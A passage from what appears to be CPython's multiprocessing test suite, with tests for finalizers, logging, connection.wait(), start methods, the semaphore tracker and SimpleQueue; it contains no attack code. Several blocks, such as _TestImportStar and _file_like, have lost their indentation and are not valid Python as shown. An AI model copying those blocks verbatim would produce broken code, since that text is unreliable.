        """copy() of a shared structure is an independent snapshot."""
        foo = _Foo(2, 5.0, 2 ** 33)
        bar = copy(foo)
        foo.x = 0
        foo.y = 0
        foo.z = 0
        self.assertEqual(bar.x, 2)
        self.assertAlmostEqual(bar.y, 5.0)
        self.assertEqual(bar.z, 2 ** 33)
#
#
#
class _TestFinalize(BaseTestCase):
    """Tests for multiprocessing.util.Finalize callbacks."""

    ALLOWED_TYPES = ('processes',)

    def setUp(self):
        # Isolate the global finalizer registry for the duration of the
        # test; restored in tearDown.
        self.registry_backup = util._finalizer_registry.copy()
        util._finalizer_registry.clear()

    def tearDown(self):
        self.assertFalse(util._finalizer_registry)
        util._finalizer_registry.update(self.registry_backup)

    @classmethod
    def _test_finalize(cls, conn):
        """Child: register finalizers in various ways and report, via
        *conn*, the order in which they fire."""
        class Foo(object):
            pass

        a = Foo()
        util.Finalize(a, conn.send, args=('a',))
        del a           # triggers callback for a

        b = Foo()
        close_b = util.Finalize(b, conn.send, args=('b',))
        close_b()       # triggers callback for b
        close_b()       # does nothing because callback has already been called
        del b           # does nothing because callback has already been called

        c = Foo()
        util.Finalize(c, conn.send, args=('c',))

        d10 = Foo()
        util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)

        d01 = Foo()
        util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
        d02 = Foo()
        util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
        d03 = Foo()
        util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)

        util.Finalize(None, conn.send, args=('e',), exitpriority=-10)

        util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)

        # call multiprocessing's cleanup function then exit process without
        # garbage collecting locals
        util._exit_function()
        conn.close()
        os._exit(0)

    def test_finalize(self):
        conn, child_conn = self.Pipe()

        p = self.Process(target=self._test_finalize, args=(child_conn,))
        p.daemon = True
        p.start()
        p.join()

        result = [obj for obj in iter(conn.recv, 'STOP')]
        # Expected order: higher exitpriority first; equal priorities in
        # reverse registration order; 'c' (no exitpriority) is not run
        # by _exit_function.
        self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])

    def test_thread_safety(self):
        # bpo-24484: _run_finalizers() should be thread-safe
        def cb():
            pass

        class Foo(object):
            def __init__(self):
                self.ref = self  # create reference cycle
                # insert finalizer at random key
                util.Finalize(self, cb, exitpriority=random.randint(1, 100))

        finish = False
        exc = None

        def run_finalizers():
            nonlocal exc
            while not finish:
                time.sleep(random.random() * 1e-1)
                try:
                    # A GC run will eventually happen during this,
                    # collecting stale Foo's and mutating the registry
                    util._run_finalizers()
                except Exception as e:
                    exc = e

        def make_finalizers():
            nonlocal exc
            d = {}
            while not finish:
                try:
                    # Old Foo's get gradually replaced and later
                    # collected by the GC (because of the cyclic ref)
                    d[random.getrandbits(5)] = {Foo() for i in range(10)}
                except Exception as e:
                    exc = e
                    d.clear()

        old_interval = sys.getswitchinterval()
        old_threshold = gc.get_threshold()
        try:
            sys.setswitchinterval(1e-6)
            gc.set_threshold(5, 5, 5)
            threads = [threading.Thread(target=run_finalizers),
                       threading.Thread(target=make_finalizers)]
            with test.support.start_threads(threads):
                time.sleep(4.0)  # Wait a bit to trigger race condition
                finish = True
            if exc is not None:
                raise exc
        finally:
            sys.setswitchinterval(old_interval)
            gc.set_threshold(*old_threshold)
            gc.collect()  # Collect remaining Foo's
#
# Test that from ... import * works for each module
#
class _TestImportStar(unittest.TestCase):
def get_module_names(self):
import glob
folder = os.path.dirname(multiprocessing.__file__)
pattern = os.path.join(folder, '*.py')
files = glob.glob(pattern)
modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files]
modules = ['multiprocessing.' + m for m in modules]
modules.remove('multiprocessing.__init__')
modules.append('multiprocessing')
return modules
def test_import(self):
modules = self.get_module_names()
if sys.platform == 'win32':
modules.remove('multiprocessing.popen_fork')
modules.remove('multiprocessing.popen_forkserver')
modules.remove('multiprocessing.popen_spawn_posix')
else:
modules.remove('multiprocessing.popen_spawn_win32')
if not HAS_REDUCTION:
modules.remove('multiprocessing.popen_forkserver')
if c_int is None:
# This module requires _ctypes
modules.remove('multiprocessing.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
self.assertTrue(hasattr(mod, '__all__'), name)
for attr in mod.__all__:
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
    """Quick test that logging works -- does not test logging output."""

    ALLOWED_TYPES = ('processes',)

    def test_enable_logging(self):
        logger = multiprocessing.get_logger()
        logger.setLevel(util.SUBWARNING)
        self.assertTrue(logger is not None)
        logger.debug('this will not be printed')
        logger.info('nor will this')
        logger.setLevel(LOG_LEVEL)   # restore the suite's default level

    @classmethod
    def _test_level(cls, conn):
        # Child: report the multiprocessing logger's effective level.
        logger = multiprocessing.get_logger()
        conn.send(logger.getEffectiveLevel())

    def test_level(self):
        """A child reports the level configured in the parent, whether
        set on the multiprocessing logger itself or inherited from the
        root logger."""
        LEVEL1 = 32
        LEVEL2 = 37

        logger = multiprocessing.get_logger()
        root_logger = logging.getLogger()
        root_level = root_logger.level

        reader, writer = multiprocessing.Pipe(duplex=False)

        # level set directly on the multiprocessing logger
        logger.setLevel(LEVEL1)
        p = self.Process(target=self._test_level, args=(writer,))
        p.start()
        self.assertEqual(LEVEL1, reader.recv())
        p.join()
        p.close()

        # level inherited from the root logger (NOTSET locally)
        logger.setLevel(logging.NOTSET)
        root_logger.setLevel(LEVEL2)
        p = self.Process(target=self._test_level, args=(writer,))
        p.start()
        self.assertEqual(LEVEL2, reader.recv())
        p.join()
        p.close()

        root_logger.setLevel(root_level)
        logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Check that Process.join() retries if os.waitpid() fails with EINTR
#
class _TestPollEintr(BaseTestCase):
    """Check that Process.join() retries if os.waitpid() fails with
    EINTR."""

    ALLOWED_TYPES = ('processes',)

    @classmethod
    def _killer(cls, pid):
        # Child: give the parent a moment to block, then interrupt it.
        time.sleep(0.1)
        os.kill(pid, signal.SIGUSR1)

    @unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
    def test_poll_eintr(self):
        got_signal = [False]
        def record(*args):
            got_signal[0] = True
        pid = os.getpid()
        oldhandler = signal.signal(signal.SIGUSR1, record)
        try:
            killer = self.Process(target=self._killer, args=(pid,))
            killer.start()
            try:
                p = self.Process(target=time.sleep, args=(2,))
                p.start()
                # join() is interrupted by SIGUSR1 but must still wait
                # for the child to exit
                p.join()
            finally:
                killer.join()
            self.assertTrue(got_signal[0])
            self.assertEqual(p.exitcode, 0)
        finally:
            signal.signal(signal.SIGUSR1, oldhandler)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
    """Handle verification on Connection construction — see issue 3321."""

    @unittest.skipIf(WIN32, "skipped on Windows")
    def test_invalid_handles(self):
        conn = multiprocessing.connection.Connection(44977608)
        # check that poll() doesn't crash
        try:
            conn.poll()
        except (ValueError, OSError):
            pass
        finally:
            # Hack private attribute _handle to avoid printing an error
            # in conn.__del__
            conn._handle = None
        # a negative handle must be rejected outright
        self.assertRaises((ValueError, OSError),
                          multiprocessing.connection.Connection, -1)
class OtherTest(unittest.TestCase):
    # TODO: add more tests for deliver/answer challenge.

    def test_deliver_challenge_auth_failure(self):
        """deliver_challenge() raises AuthenticationError when the peer
        replies with a bogus digest."""
        class _FakeConnection(object):
            def recv_bytes(self, size):
                return b'something bogus'
            def send_bytes(self, data):
                pass
        self.assertRaises(multiprocessing.AuthenticationError,
                          multiprocessing.connection.deliver_challenge,
                          _FakeConnection(), b'abc')

    def test_answer_challenge_auth_failure(self):
        """answer_challenge() raises AuthenticationError when, after a
        valid CHALLENGE message, the server's follow-up is bogus."""
        class _FakeConnection(object):
            def __init__(self):
                self.count = 0
            def recv_bytes(self, size):
                self.count += 1
                if self.count == 1:
                    return multiprocessing.connection.CHALLENGE
                elif self.count == 2:
                    return b'something bogus'
                return b''
            def send_bytes(self, data):
                pass
        self.assertRaises(multiprocessing.AuthenticationError,
                          multiprocessing.connection.answer_challenge,
                          _FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
def initializer(ns):
    """Worker/manager initializer: bump the shared namespace's ``test``
    counter by one (see issue 5585)."""
    ns.test = ns.test + 1
class TestInitializers(unittest.TestCase):
    """Test Manager.start()/Pool.__init__() initializer feature — see
    issue 5585."""

    def setUp(self):
        self.mgr = multiprocessing.Manager()
        self.ns = self.mgr.Namespace()
        self.ns.test = 0

    def tearDown(self):
        self.mgr.shutdown()
        self.mgr.join()

    def test_manager_initializer(self):
        m = multiprocessing.managers.SyncManager()
        # a non-callable initializer must be rejected
        self.assertRaises(TypeError, m.start, 1)
        m.start(initializer, (self.ns,))
        self.assertEqual(self.ns.test, 1)
        m.shutdown()
        m.join()

    def test_pool_initializer(self):
        self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
        p = multiprocessing.Pool(1, initializer, (self.ns,))
        p.close()
        p.join()
        self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
#
def _this_sub_process(q):
    """Grandchild target: attempt a non-blocking get from *q*,
    tolerating an empty queue."""
    try:
        item = q.get(block=False)
    except pyqueue.Empty:
        pass
def _test_process():
    """Child target: create a Queue and run a sub-process that reads
    from it (issues 5155, 5313, 5331)."""
    queue = multiprocessing.Queue()
    subProc = multiprocessing.Process(target=_this_sub_process, args=(queue,))
    subProc.daemon = True
    subProc.start()
    subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
    """Child target: create and use a Pool inside a child process,
    then shut it down cleanly (issues 5155, 5313, 5331)."""
    pool = multiprocessing.Pool(processes=4)
    # Fix: the map() result was bound to an unused local; only the
    # side effect of exercising the pool matters here.
    pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
    pool.close()
    pool.join()
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork keeps only the running thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
    """Issues 5155, 5313, 5331: nested process/pool creation and
    stdin/stdout handling."""

    def test_queue_in_process(self):
        proc = multiprocessing.Process(target=_test_process)
        proc.start()
        proc.join()

    def test_pool_in_process(self):
        p = multiprocessing.Process(target=pool_in_process)
        p.start()
        p.join()

    def test_flushing(self):
        sio = io.StringIO()
        flike = _file_like(sio)
        flike.write('foo')
        # NOTE(review): 'proc' is constructed but never started —
        # presumably only Process.__init__'s handling of the target is
        # being exercised here; confirm before removing.
        proc = multiprocessing.Process(target=lambda: flike.flush())
        flike.flush()
        assert sio.getvalue() == 'foo'
class TestWait(unittest.TestCase):
    """Tests for multiprocessing.connection.wait()."""

    @classmethod
    def _child_test_wait(cls, w, slow):
        # Child: send ten (i, pid) tuples, with random delays if *slow*.
        for i in range(10):
            if slow:
                time.sleep(random.random()*0.1)
            w.send((i, os.getpid()))
        w.close()

    def test_wait(self, slow=False):
        """wait() multiplexes four child pipes until all hit EOF; every
        message from every child must be collected exactly once."""
        from multiprocessing.connection import wait
        readers = []
        procs = []
        messages = []

        for i in range(4):
            r, w = multiprocessing.Pipe(duplex=False)
            p = multiprocessing.Process(target=self._child_test_wait, args=(w, slow))
            p.daemon = True
            p.start()
            w.close()   # so EOF is seen once the child closes its end
            readers.append(r)
            procs.append(p)
            self.addCleanup(p.join)

        while readers:
            for r in wait(readers):
                try:
                    msg = r.recv()
                except EOFError:
                    readers.remove(r)
                    r.close()
                else:
                    messages.append(msg)

        messages.sort()
        expected = sorted((i, p.pid) for i in range(10) for p in procs)
        self.assertEqual(messages, expected)

    @classmethod
    def _child_test_wait_socket(cls, address, slow):
        # Child: connect to *address* and send '0\n'..'9\n'.
        s = socket.socket()
        s.connect(address)
        for i in range(10):
            if slow:
                time.sleep(random.random()*0.1)
            s.sendall(('%s\n' % i).encode('ascii'))
        s.close()

    def test_wait_socket(self, slow=False):
        """Same as test_wait but multiplexing raw sockets."""
        from multiprocessing.connection import wait
        l = socket.socket()
        l.bind((test.support.HOST, 0))
        l.listen()
        addr = l.getsockname()
        readers = []
        procs = []
        dic = {}

        for i in range(4):
            p = multiprocessing.Process(target=self._child_test_wait_socket,
                                        args=(addr, slow))
            p.daemon = True
            p.start()
            procs.append(p)
            self.addCleanup(p.join)

        for i in range(4):
            r, _ = l.accept()
            readers.append(r)
            dic[r] = []
        l.close()

        while readers:
            for r in wait(readers):
                msg = r.recv(32)
                if not msg:
                    readers.remove(r)
                    r.close()
                else:
                    dic[r].append(msg)

        expected = ''.join('%s\n' % i for i in range(10)).encode('ascii')
        for v in dic.values():
            self.assertEqual(b''.join(v), expected)

    def test_wait_slow(self):
        self.test_wait(True)

    def test_wait_socket_slow(self):
        self.test_wait_socket(True)

    def test_wait_timeout(self):
        """wait() times out roughly on schedule, and returns promptly
        once an object becomes ready."""
        from multiprocessing.connection import wait

        expected = 5
        a, b = multiprocessing.Pipe()

        start = time.monotonic()
        res = wait([a, b], expected)
        delta = time.monotonic() - start

        self.assertEqual(res, [])
        # generous bounds to tolerate slow buildbots
        self.assertLess(delta, expected * 2)
        self.assertGreater(delta, expected * 0.5)

        b.send(None)

        start = time.monotonic()
        res = wait([a, b], 20)
        delta = time.monotonic() - start

        self.assertEqual(res, [a])
        self.assertLess(delta, 0.4)

    @classmethod
    def signal_and_sleep(cls, sem, period):
        # Child: announce readiness, then stay alive for *period* secs.
        sem.release()
        time.sleep(period)

    def test_wait_integer(self):
        """wait() accepts a raw process sentinel (an int) alongside
        connection objects."""
        from multiprocessing.connection import wait

        expected = 3
        sorted_ = lambda l: sorted(l, key=lambda x: id(x))
        sem = multiprocessing.Semaphore(0)
        a, b = multiprocessing.Pipe()
        p = multiprocessing.Process(target=self.signal_and_sleep,
                                    args=(sem, expected))

        p.start()
        self.assertIsInstance(p.sentinel, int)
        self.assertTrue(sem.acquire(timeout=20))

        start = time.monotonic()
        res = wait([a, p.sentinel, b], expected + 20)
        delta = time.monotonic() - start

        self.assertEqual(res, [p.sentinel])
        self.assertLess(delta, expected + 2)
        self.assertGreater(delta, expected - 2)

        a.send(None)

        start = time.monotonic()
        res = wait([a, p.sentinel, b], 20)
        delta = time.monotonic() - start

        self.assertEqual(sorted_(res), sorted_([p.sentinel, b]))
        self.assertLess(delta, 0.4)

        b.send(None)

        start = time.monotonic()
        res = wait([a, p.sentinel, b], 20)
        delta = time.monotonic() - start

        self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b]))
        self.assertLess(delta, 0.4)

        p.terminate()
        p.join()

    def test_neg_timeout(self):
        # a negative timeout behaves like a zero timeout
        from multiprocessing.connection import wait
        a, b = multiprocessing.Pipe()
        t = time.monotonic()
        res = wait([a], timeout=-1)
        t = time.monotonic() - t
        self.assertEqual(res, [])
        self.assertLess(t, 1)
        a.close()
        b.close()
#
# Issue 14151: Test invalid family on invalid environment
#
class TestInvalidFamily(unittest.TestCase):
    """Issue 14151: Listener must reject an address whose form does not
    match any family valid on this platform."""

    @unittest.skipIf(WIN32, "skipped on Windows")
    def test_invalid_family(self):
        # a Windows named-pipe path is invalid on POSIX
        with self.assertRaises(ValueError):
            multiprocessing.connection.Listener(r'\\.\test')

    @unittest.skipUnless(WIN32, "skipped on non-Windows platforms")
    def test_invalid_family_win32(self):
        # a POSIX path is not a valid pipe address on Windows
        with self.assertRaises(ValueError):
            multiprocessing.connection.Listener('/var/test.pipe')
#
# Issue 12098: check sys.flags of child matches that for parent
#
class TestFlags(unittest.TestCase):
    """Issue 12098: check sys.flags of child matches that for parent."""

    @classmethod
    def run_in_grandchild(cls, conn):
        # Grandchild: report its interpreter flags to the child.
        conn.send(tuple(sys.flags))

    @classmethod
    def run_in_child(cls):
        # Child: spawn a grandchild and print both flag tuples as JSON
        # on stdout for the parent to compare.
        import json
        r, w = multiprocessing.Pipe(duplex=False)
        p = multiprocessing.Process(target=cls.run_in_grandchild, args=(w,))
        p.start()
        grandchild_flags = r.recv()
        p.join()
        r.close()
        w.close()
        flags = (tuple(sys.flags), grandchild_flags)
        print(json.dumps(flags))

    def test_flags(self):
        import json, subprocess
        # start child process using unusual flags
        prog = ('from test._test_multiprocessing import TestFlags; ' +
                'TestFlags.run_in_child()')
        data = subprocess.check_output(
            [sys.executable, '-E', '-S', '-O', '-c', prog])
        child_flags, grandchild_flags = json.loads(data.decode('ascii'))
        self.assertEqual(child_flags, grandchild_flags)
#
# Test interaction with socket timeouts - see Issue #6056
#
class TestTimeouts(unittest.TestCase):
    """Test interaction with socket timeouts — see Issue #6056."""

    @classmethod
    def _test_timeout(cls, child, address):
        # Child: reply over the pipe after a delay, then connect back
        # to the parent's listener.
        time.sleep(1)
        child.send(123)
        child.close()
        conn = multiprocessing.connection.Client(address)
        conn.send(456)
        conn.close()

    def test_timeout(self):
        """Pipe/Listener traffic works even with a very small global
        socket default timeout in effect."""
        old_timeout = socket.getdefaulttimeout()
        try:
            socket.setdefaulttimeout(0.1)
            parent, child = multiprocessing.Pipe(duplex=True)
            l = multiprocessing.connection.Listener(family='AF_INET')
            p = multiprocessing.Process(target=self._test_timeout,
                                        args=(child, l.address))
            p.start()
            child.close()
            self.assertEqual(parent.recv(), 123)
            parent.close()
            conn = l.accept()
            self.assertEqual(conn.recv(), 456)
            conn.close()
            l.close()
            join_process(p)
        finally:
            socket.setdefaulttimeout(old_timeout)
#
# Test what happens with no "if __name__ == '__main__'"
#
class TestNoForkBomb(unittest.TestCase):
    """Test what happens with no "if __name__ == '__main__'" guard in
    the spawned module (mp_fork_bomb.py)."""

    def test_noforkbomb(self):
        sm = multiprocessing.get_start_method()
        name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py')
        if sm != 'fork':
            # spawn/forkserver re-import the main module, so the
            # unguarded script must fail with RuntimeError instead of
            # fork-bombing
            rc, out, err = test.support.script_helper.assert_python_failure(name, sm)
            self.assertEqual(out, b'')
            self.assertIn(b'RuntimeError', err)
        else:
            rc, out, err = test.support.script_helper.assert_python_ok(name, sm)
            self.assertEqual(out.rstrip(), b'123')
            self.assertEqual(err, b'')
#
# Issue #17555: ForkAwareThreadLock
#
class TestForkAwareThreadLock(unittest.TestCase):
    # We recursively start processes.  Issue #17555 meant that the
    # after fork registry would get duplicate entries for the same
    # lock.  The size of the registry at generation n was ~2**n.

    @classmethod
    def child(cls, n, conn):
        # Recurse n generations deep, then report the registry size
        # from the deepest descendant.
        if n > 1:
            p = multiprocessing.Process(target=cls.child, args=(n-1, conn))
            p.start()
            conn.close()
            join_process(p)
        else:
            conn.send(len(util._afterfork_registry))
            conn.close()

    def test_lock(self):
        r, w = multiprocessing.Pipe(False)
        # create the lock before measuring, so its registry entry is
        # included in old_size
        l = util.ForkAwareThreadLock()
        old_size = len(util._afterfork_registry)
        p = multiprocessing.Process(target=self.child, args=(5, w))
        p.start()
        w.close()
        new_size = r.recv()
        join_process(p)
        # the registry must not grow across generations (no duplicates)
        self.assertLessEqual(new_size, old_size)
#
# Check that non-forked child processes do not inherit unneeded fds/handles
#
class TestCloseFds(unittest.TestCase):
    """Check that non-forked child processes do not inherit unneeded
    fds/handles."""

    def get_high_socket_fd(self):
        if WIN32:
            # The child process will not have any socket handles, so
            # calling socket.fromfd() should produce WSAENOTSOCK even
            # if there is a handle of the same number.
            return socket.socket().detach()
        else:
            # We want to produce a socket with an fd high enough that a
            # freshly created child process will not have any fds as high.
            fd = socket.socket().detach()
            to_close = []
            while fd < 50:
                to_close.append(fd)
                fd = os.dup(fd)
            for x in to_close:
                os.close(x)
            return fd

    def close(self, fd):
        if WIN32:
            # wrap the handle in a socket object so closing releases it
            socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=fd).close()
        else:
            os.close(fd)

    @classmethod
    def _test_closefds(cls, conn, fd):
        # Child: report (over *conn*) the exception raised when trying
        # to use *fd* as a socket, or None on success.
        try:
            s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
        except Exception as e:
            conn.send(e)
        else:
            s.close()
            conn.send(None)

    def test_closefd(self):
        if not HAS_REDUCTION:
            raise unittest.SkipTest('requires fd pickling')

        reader, writer = multiprocessing.Pipe()
        fd = self.get_high_socket_fd()
        try:
            p = multiprocessing.Process(target=self._test_closefds,
                                        args=(writer, fd))
            p.start()
            writer.close()
            e = reader.recv()
            join_process(p)
        finally:
            self.close(fd)
            writer.close()
            reader.close()

        if multiprocessing.get_start_method() == 'fork':
            # fork children inherit every fd, so no error is expected
            self.assertIs(e, None)
        else:
            WSAENOTSOCK = 10038
            self.assertIsInstance(e, OSError)
            self.assertTrue(e.errno == errno.EBADF or
                            e.winerror == WSAENOTSOCK, e)
#
# Issue #17097: EINTR should be ignored by recv(), send(), accept() etc
#
class TestIgnoreEINTR(unittest.TestCase):
    """Issue #17097: EINTR should be ignored by recv(), send(),
    accept() etc."""

    # Sending CONN_MAX_SIZE bytes into a multiprocessing pipe must block
    CONN_MAX_SIZE = max(support.PIPE_MAX_SIZE, support.SOCK_MAX_SIZE)

    @classmethod
    def _test_ignore(cls, conn):
        # Child: install a no-op SIGUSR1 handler, then perform recv()
        # and a blocking send_bytes() that the parent will interrupt.
        def handler(signum, frame):
            pass
        signal.signal(signal.SIGUSR1, handler)
        conn.send('ready')
        x = conn.recv()
        conn.send(x)
        conn.send_bytes(b'x' * cls.CONN_MAX_SIZE)

    @unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
    def test_ignore(self):
        conn, child_conn = multiprocessing.Pipe()
        try:
            p = multiprocessing.Process(target=self._test_ignore,
                                        args=(child_conn,))
            p.daemon = True
            p.start()
            child_conn.close()
            self.assertEqual(conn.recv(), 'ready')
            time.sleep(0.1)
            # interrupt the child's blocking recv()
            os.kill(p.pid, signal.SIGUSR1)
            time.sleep(0.1)
            conn.send(1234)
            self.assertEqual(conn.recv(), 1234)
            time.sleep(0.1)
            # interrupt the child's blocking send_bytes()
            os.kill(p.pid, signal.SIGUSR1)
            self.assertEqual(conn.recv_bytes(), b'x' * self.CONN_MAX_SIZE)
            time.sleep(0.1)
            p.join()
        finally:
            conn.close()

    @classmethod
    def _test_ignore_listener(cls, conn):
        # Child: install a no-op SIGUSR1 handler, then block in accept()
        # which the parent interrupts before connecting.
        def handler(signum, frame):
            pass
        signal.signal(signal.SIGUSR1, handler)
        with multiprocessing.connection.Listener() as l:
            conn.send(l.address)
            a = l.accept()
            a.send('welcome')

    @unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
    def test_ignore_listener(self):
        conn, child_conn = multiprocessing.Pipe()
        try:
            p = multiprocessing.Process(target=self._test_ignore_listener,
                                        args=(child_conn,))
            p.daemon = True
            p.start()
            child_conn.close()
            address = conn.recv()
            time.sleep(0.1)
            # interrupt the child's blocking accept()
            os.kill(p.pid, signal.SIGUSR1)
            time.sleep(0.1)
            client = multiprocessing.connection.Client(address)
            self.assertEqual(client.recv(), 'welcome')
            p.join()
        finally:
            conn.close()
class TestStartMethod(unittest.TestCase):
    """Tests for get_start_method()/set_start_method() and start-method
    contexts (fork / spawn / forkserver)."""

    @classmethod
    def _check_context(cls, conn):
        # Child: report which start method it observes.
        conn.send(multiprocessing.get_start_method())

    def check_context(self, ctx):
        # Start a child via *ctx* and verify the child sees ctx's method.
        r, w = ctx.Pipe(duplex=False)
        p = ctx.Process(target=self._check_context, args=(w,))
        p.start()
        w.close()
        child_method = r.recv()
        r.close()
        p.join()
        self.assertEqual(child_method, ctx.get_start_method())

    def test_context(self):
        for method in ('fork', 'spawn', 'forkserver'):
            try:
                ctx = multiprocessing.get_context(method)
            except ValueError:
                # Method not supported on this platform.
                continue
            self.assertEqual(ctx.get_start_method(), method)
            self.assertIs(ctx.get_context(), ctx)
            # A concrete context's start method cannot be changed.
            self.assertRaises(ValueError, ctx.set_start_method, 'spawn')
            self.assertRaises(ValueError, ctx.set_start_method, None)
            self.check_context(ctx)

    def test_set_get(self):
        multiprocessing.set_forkserver_preload(PRELOAD)
        count = 0
        old_method = multiprocessing.get_start_method()
        try:
            for method in ('fork', 'spawn', 'forkserver'):
                try:
                    multiprocessing.set_start_method(method, force=True)
                except ValueError:
                    # Method not supported on this platform.
                    continue
                self.assertEqual(multiprocessing.get_start_method(), method)
                ctx = multiprocessing.get_context()
                self.assertEqual(ctx.get_start_method(), method)
                self.assertTrue(type(ctx).__name__.lower().startswith(method))
                self.assertTrue(
                    ctx.Process.__name__.lower().startswith(method))
                self.check_context(multiprocessing)
                count += 1
        finally:
            # Restore the process-global start method changed above.
            multiprocessing.set_start_method(old_method, force=True)
        self.assertGreaterEqual(count, 1)

    def test_get_all(self):
        methods = multiprocessing.get_all_start_methods()
        if sys.platform == 'win32':
            self.assertEqual(methods, ['spawn'])
        else:
            self.assertTrue(methods == ['fork', 'spawn'] or
                            methods == ['fork', 'spawn', 'forkserver'])

    def test_preload_resources(self):
        if multiprocessing.get_start_method() != 'forkserver':
            self.skipTest("test only relevant for 'forkserver' method")
        name = os.path.join(os.path.dirname(__file__), 'mp_preload.py')
        rc, out, err = test.support.script_helper.assert_python_ok(name)
        out = out.decode()
        err = err.decode()
        if out.rstrip() != 'ok' or err != '':
            print(out)
            print(err)
            self.fail("failed spawning forkserver or grandchild")
@unittest.skipIf(sys.platform == "win32",
                 "test semantics don't make sense on Windows")
class TestSemaphoreTracker(unittest.TestCase):
    """Tests for the semaphore_tracker helper process that cleans up
    leaked POSIX named semaphores."""

    def test_semaphore_tracker(self):
        #
        # Check that killing process does not leak named semaphores
        #
        import subprocess
        cmd = '''if 1:
            import multiprocessing as mp, time, os
            mp.set_start_method("spawn")
            lock1 = mp.Lock()
            lock2 = mp.Lock()
            os.write(%d, lock1._semlock.name.encode("ascii") + b"\\n")
            os.write(%d, lock2._semlock.name.encode("ascii") + b"\\n")
            time.sleep(10)
        '''
        r, w = os.pipe()
        p = subprocess.Popen([sys.executable,
                              '-E', '-c', cmd % (w, w)],
                             pass_fds=[w],
                             stderr=subprocess.PIPE)
        os.close(w)
        with open(r, 'rb', closefd=True) as f:
            name1 = f.readline().rstrip().decode('ascii')
            name2 = f.readline().rstrip().decode('ascii')
        # Unlink name1 ourselves, leaving only name2 for the tracker to
        # clean up after the child is killed.
        _multiprocessing.sem_unlink(name1)
        p.terminate()
        p.wait()
        time.sleep(2.0)
        with self.assertRaises(OSError) as ctx:
            # Should already have been unlinked by the tracker.
            _multiprocessing.sem_unlink(name2)
        # docs say it should be ENOENT, but OSX seems to give EINVAL
        self.assertIn(ctx.exception.errno, (errno.ENOENT, errno.EINVAL))
        err = p.stderr.read().decode('utf-8')
        p.stderr.close()
        expected = 'semaphore_tracker: There appear to be 2 leaked semaphores'
        self.assertRegex(err, expected)
        self.assertRegex(err, r'semaphore_tracker: %r: \[Errno' % name1)

    def check_semaphore_tracker_death(self, signum, should_die):
        # bpo-31310: if the semaphore tracker process has died, it should
        # be restarted implicitly.
        from multiprocessing.semaphore_tracker import _semaphore_tracker
        _semaphore_tracker.ensure_running()
        pid = _semaphore_tracker._pid
        os.kill(pid, signum)
        time.sleep(1.0)  # give it time to die

        ctx = multiprocessing.get_context("spawn")
        with contextlib.ExitStack() as stack:
            if should_die:
                stack.enter_context(self.assertWarnsRegex(
                    UserWarning,
                    "semaphore_tracker: process died"))
            sem = ctx.Semaphore()
            sem.acquire()
            sem.release()
            wr = weakref.ref(sem)
            # ensure `sem` gets collected, which triggers communication with
            # the semaphore tracker
            del sem
            gc.collect()
            self.assertIsNone(wr())

    def test_semaphore_tracker_sigint(self):
        # Catchable signal (ignored by semaphore tracker)
        self.check_semaphore_tracker_death(signal.SIGINT, False)

    def test_semaphore_tracker_sigkill(self):
        # Uncatchable signal.
        self.check_semaphore_tracker_death(signal.SIGKILL, True)
class TestSimpleQueue(unittest.TestCase):
    """Tests for multiprocessing.SimpleQueue."""

    @classmethod
    def _test_empty(cls, queue, child_can_start, parent_can_continue):
        child_can_start.wait()
        # issue 30301, could fail under spawn and forkserver
        try:
            # First put() records an empty queue (True); the second then
            # records a non-empty one (False).
            queue.put(queue.empty())
            queue.put(queue.empty())
        finally:
            parent_can_continue.set()

    def test_empty(self):
        queue = multiprocessing.SimpleQueue()
        child_can_start = multiprocessing.Event()
        parent_can_continue = multiprocessing.Event()

        proc = multiprocessing.Process(
            target=self._test_empty,
            args=(queue, child_can_start, parent_can_continue)
        )
        proc.daemon = True
        proc.start()

        self.assertTrue(queue.empty())

        child_can_start.set()
        parent_can_continue.wait()

        self.assertFalse(queue.empty())
        self.assertEqual(queue.get(), True)
        self.assertEqual(queue.get(), False)
        self.assertTrue(queue.empty())

        proc.join()
class TestSyncManagerTypes(unittest.TestCase):
    """Test all the types which can be shared between a parent and a
    child process by using a manager which acts as an intermediary
    between them.

    In the following unit-tests the base type is created in the parent
    process, the @classmethod represents the worker process and the
    shared object is readable and editable between the two.

    # The child.
    @classmethod
    def _test_list(cls, obj):
        assert obj[0] == 5
        assert obj.append(6)

    # The parent.
